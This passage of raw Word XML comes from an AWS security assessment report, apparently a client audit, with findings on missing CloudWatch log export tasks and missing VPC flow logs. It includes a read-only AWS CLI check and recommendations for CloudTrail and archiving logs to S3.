          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tasks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId233">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/cloudwatch/home?region=us-east-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-5"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>1#l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tasks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>defined.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>VPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>defined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="377"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No VPC flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>defined.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>At</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>minimum,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>listed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the VPCs with the main workloads (ECS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reviewing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>VPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>so:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="37" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>VPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>VPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="1440" w:right="475"/>
      </w:pPr>
      <w:hyperlink r:id="rId234">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#VpcDet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId234">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>ails:VpcId=vpc-064965b22e87fc27c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following command confirms there are no flow logs defined in the regions for the AWS accounts provided during this assignment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for r in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"us-east-1" "us-east-2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>; do aws ec2 describe-flow-logs; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="95"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"FlowLogs"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: [] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="161"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="373"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>regions,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ensure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>automatically archived in encrypted S3 buckets that belong to a separate AWS account. By default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CloudTrail </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stores only the last 90 days of activity in AWS, thus archiving is crucial for potential forensic investigations in case of a breach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is further advised to improve logging for critical resources like S3 buckets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>154</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, lambda functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>155</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>156</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, load balancers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>157</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and log export for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>158</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>VPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>flow logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>159</w:t>
      </w:r>
      <w:r>
        <w:rPr>
